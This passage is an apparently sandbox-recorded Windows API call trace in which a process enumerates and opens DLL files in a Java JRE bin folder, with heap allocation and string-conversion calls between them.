returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.992] AreFileApisANSI () returned 1 [0090.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6e) returned 0x75e40 [0090.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x75e40, cchWideChar=55 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll") returned 55 [0090.992] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fontmanager.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fontmanager.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x43040)) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0090.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.992] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.992] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2da40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="fxplugins.dll", cAlternateFileName="FXPLUG~1.DLL")) returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f10 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f10 | out: hHeap=0x20000) returned 1 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.992] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.992] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d108 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x69db0 [0090.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d108 | out: hHeap=0x20000) returned 1 [0090.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0090.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0090.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0090.993] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.993] AreFileApisANSI () returned 1 [0090.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll", lpUsedDefaultChar=0x0) returned 53 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x536d0 [0090.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.993] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0090.993] AreFileApisANSI () returned 1 [0090.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0090.993] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x76188 [0090.993] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x76188, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 53 [0090.993] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.994] GetFileType (hFile=0x418) returned 0x1 [0090.994] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0090.995] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.995] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.995] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.995] CloseHandle (hObject=0x418) returned 1 [0090.995] AreFileApisANSI () returned 1 [0090.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0090.995] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0090.995] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 53 [0090.995] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.995] GetFileType (hFile=0x418) returned 0x1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0090.996] CloseHandle (hObject=0x418) returned 1 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0090.996] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.996] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.997] AreFileApisANSI () returned 1 [0090.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 53 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x6a) returned 0x75dc8 [0090.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x536d0, cbMultiByte=-1, lpWideCharStr=0x75dc8, cchWideChar=53 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll") returned 53 [0090.997] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\fxplugins.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\fxplugins.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x2da40)) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x536d0 | out: hHeap=0x20000) returned 1 [0090.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.997] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.997] FindNextFileW (in: hFindFile=0x78610, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa7453105, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa7453105, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa7453105, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x40e40, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="glass.dll", cAlternateFileName="")) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35170 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35170 | out: hHeap=0x20000) returned 1 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0090.997] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350f0 [0090.997] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0090.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350f0 | out: hHeap=0x20000) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a9b0 [0090.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0090.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0090.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a9b0 | out: hHeap=0x20000) returned 1 [0090.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0090.998] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0090.998] AreFileApisANSI () returned 1 [0090.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll", lpUsedDefaultChar=0x0) returned 49 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0090.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.998] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0090.998] AreFileApisANSI () returned 1 [0090.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0090.998] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46a58 [0090.998] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46a58, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 49 [0090.998] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0090.999] GetFileType (hFile=0x418) returned 0x1 [0090.999] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0090.999] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0090.999] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0090.999] SetFilePointerEx (in: hFile=0x418, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0090.999] CloseHandle (hObject=0x418) returned 1 [0090.999] AreFileApisANSI () returned 1 [0090.999] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0090.999] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46ba8 [0091.000] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46ba8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll") returned 49 [0091.000] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\glass.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\glass.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x418 [0091.000] GetFileType (hFile=0x418) returned 0x1 [0091.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ba8 | out: hHeap=0x20000) returned 1 [0091.000] CloseHandle (hObject=0x418) returned 1 [0091.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0091.000] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0091.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.000] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0091.001] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0091.001] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) 